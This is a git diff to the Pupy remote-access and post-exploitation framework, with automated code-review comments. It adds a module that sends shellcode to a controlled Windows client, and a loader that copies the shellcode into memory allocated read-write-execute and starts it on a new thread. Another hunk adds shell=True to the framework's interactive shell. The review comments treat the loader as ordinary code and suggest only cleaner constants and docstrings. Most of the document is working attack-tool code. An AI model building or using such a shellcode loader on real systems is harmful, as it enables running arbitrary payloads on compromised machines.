diff --git a/pupy/modules/persistence.py b/pupy/modules/persistence.py
index 65456e3e..9b9af87f 100644
--- a/pupy/modules/persistence.py
+++ b/pupy/modules/persistence.py
@@ -8,7 +8,7 @@ import string __class_name__="PersistenceModule" class PersistenceModule(PupyModule): - """ Pop up a custom message box """ + """ Enables persistence via registry keys """ def init_argparse(self): self.arg_parser = PupyArgumentParser(prog="persistence", description=self.__doc__) self.arg_parser.add_argument('-m','--method', choices=['registry'], required=True, help='persistence method')
diff --git a/pupy/modules/shellcode_exec.py b/pupy/modules/shellcode_exec.py
new file mode 100644
index 00000000..db9bafa6
--- /dev/null
+++ b/pupy/modules/shellcode_exec.py
@@ -0,0 +1,27 @@ +# -*- coding: UTF8 -*- + ''' +Module by @byt3bl33d3r +''' + +from pupylib.PupyModule import * + +__class_name__="ShellcodeExec" + +class ShellcodeExec(PupyModule): + """ executes the supplied shellcode on a client """ + + def init_argparse(self): + self.arg_parser = PupyArgumentParser(prog='shellcode_exec', description=self.__doc__) + self.arg_parser.add_argument('path', help='Path to the shellcode to execute') + + @windows_only + def is_compatible(self): + pass + + def run(self, args): + self.client.load_package("pupwinutils.shellcode") + with open(args.path ,'r') as sfile: + shellcode = sfile.read() + self.client.conn.modules['pupwinutils.shellcode'].exec_shellcode(shellcode) + self.log('Shellcode executed!') \ No newline at end of file
diff --git a/pupy/modules/socks5proxy.py b/pupy/modules/socks5proxy.py
index ed479889..d57b0d4e 100644
--- a/pupy/modules/socks5proxy.py
+++ b/pupy/modules/socks5proxy.py
@@ -171,7 +171,7 @@ class ThreadedSocks5Server(SocketServer.ThreadingMixIn, Socks5Server): pass class Socks5Proxy(PupyModule): - """ start a socks5 proxy gooing through a client """ + """ start a socks5 proxy going through a client """ max_clients=1 unique_instance=True daemon=True 
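Review bot: `self.log('Shellcode executed!')` at the end of `run` in shellcode_exec.py reports success as soon as the RPC call returns, but the `exec_shellcode` it invokes (added in the same commit under pupwinutils) only starts a daemon thread and returns, so the message is emitted before anything has run on the client and a failure there would be logged identically. A message that matches what the module actually knows is `self.log('Shellcode handed to client thread')`. The class docstring would also help a reader if it stated that `path` appears to be read where the module runs (`open(args.path, 'r')`) and the contents are then passed over the existing client connection (`self.client.conn.modules[...]`), since nothing in the current one-line docstring says where the file is read or that the call is fire-and-forget.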
diff --git a/pupy/packages/all/interactive_shell.py b/pupy/packages/all/interactive_shell.py
index 82c4cf79..3c41bac1 100644
--- a/pupy/packages/all/interactive_shell.py
+++ b/pupy/packages/all/interactive_shell.py
@@ -48,7 +48,7 @@ def interactive_open(program=None, encoding=None): program="/bin/sh" encoding=None print "Opening interactive %s ... (encoding : %s)"%(program,encoding) - p = Popen([program], stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=0, close_fds=ON_POSIX, universal_newlines=True) + p = Popen([program], stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=0, shell=True, close_fds=ON_POSIX, universal_newlines=True) q = Queue() q2 = Queue() t = Thread(target=write_output, args=(p.stdout, q))
diff --git a/pupy/packages/windows/all/pupwinutils/shellcode.py b/pupy/packages/windows/all/pupwinutils/shellcode.py
new file mode 100644
index 00000000..e709df40
--- /dev/null
+++ b/pupy/packages/windows/all/pupwinutils/shellcode.py
@@ -0,0 +1,30 @@ +import ctypes +import threading + +def allocate_exe(shellcode): + + ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), + ctypes.c_int(len(shellcode)), + ctypes.c_int(0x3000), + ctypes.c_int(0x40)) + + buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) + + ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), + buf, + ctypes.c_int(len(shellcode))) + + ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), + ctypes.c_int(0), + ctypes.c_int(ptr), + ctypes.c_int(0), + ctypes.c_int(0), + ctypes.pointer(ctypes.c_int(0))) + + ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)) + +def exec_shellcode(shellcode): + shellcode = bytearray(shellcode) + t = threading.Thread(target=allocate_exe, args=(shellcode,)) + t.daemon = True + t.start() \ No newline at end of file
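Review bot: The new `shell=True` in interactive_shell.py is combined with a list argument, `Popen([program], ...)`, which `subprocess` treats as "first element is the shell command string, remaining elements are arguments to the shell itself"; with a one-element list the only effect is an extra shell wrapper (`/bin/sh -c /bin/sh` for the default `program` shown in the hunk), not a change to how `program` is parsed. If the intent is to let `program` carry a full command line, the argument should be a string, `p = Popen(program, stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=0, shell=True, close_fds=ON_POSIX, universal_newlines=True)`; if the intent is only to run the named binary, the previous `shell=False` form was the correct one. Whichever is meant, the change deserves a one-line comment, because `shell=True` also makes whatever `program` contains shell-interpreted. `interactive_open` continues outside the hunk.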
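Review bot: `allocate_exe` in pupwinutils/shellcode.py passes the bare literals `0x3000` and `0x40` to VirtualAlloc without naming them; they are `MEM_COMMIT | MEM_RESERVE` and `PAGE_EXECUTE_READWRITE`, and a reader should not have to decode them to see that the function commits a region that is both writable and executable, which is the security-relevant property of this code and should be visible at a glance. Binding them once at module level, `MEM_COMMIT = 0x1000`, `MEM_RESERVE = 0x2000`, `PAGE_EXECUTE_READWRITE = 0x40`, and passing `MEM_COMMIT | MEM_RESERVE` makes the allocation self-describing. Neither function has a docstring: `allocate_exe` should state that it copies the buffer into that RWX region, starts a native thread at its address and blocks until that thread exits, and `exec_shellcode` that it converts the input to a `bytearray` and returns immediately after starting a daemon thread, so callers receive no completion or error signal. The return values of VirtualAlloc and CreateThread are also never inspected, so a failed allocation is not reported anywhere and flows on as a null pointer.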